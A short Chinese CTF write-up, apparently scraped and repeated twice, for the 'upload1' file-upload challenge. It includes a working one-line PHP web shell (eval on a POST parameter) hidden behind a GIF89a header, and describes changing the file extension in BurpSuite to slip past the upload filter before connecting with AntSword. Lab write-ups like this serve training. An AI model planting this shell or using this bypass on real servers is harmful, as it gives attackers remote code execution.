攻防世界之upload1
題目
檔案上傳漏洞,是以上傳一句話木馬…
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
一開始是直接上傳php檔案,但是發現它會被攔下
沒關系,那就先改成檔案字尾名,然後用BurpSuite抓包!
然後再用BurpSuite改一下字尾名就可以了(改成php檔案)
最後再用蟻劍連結就可以得到Flag了
題目
檔案上傳漏洞,是以上傳一句話木馬…
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
一開始是直接上傳php檔案,但是發現它會被攔下
沒關系,那就先改成檔案字尾名,然後用BurpSuite抓包!
然後再用BurpSuite改一下字尾名就可以了(改成php檔案)
最後再用蟻劍連結就可以得到Flag了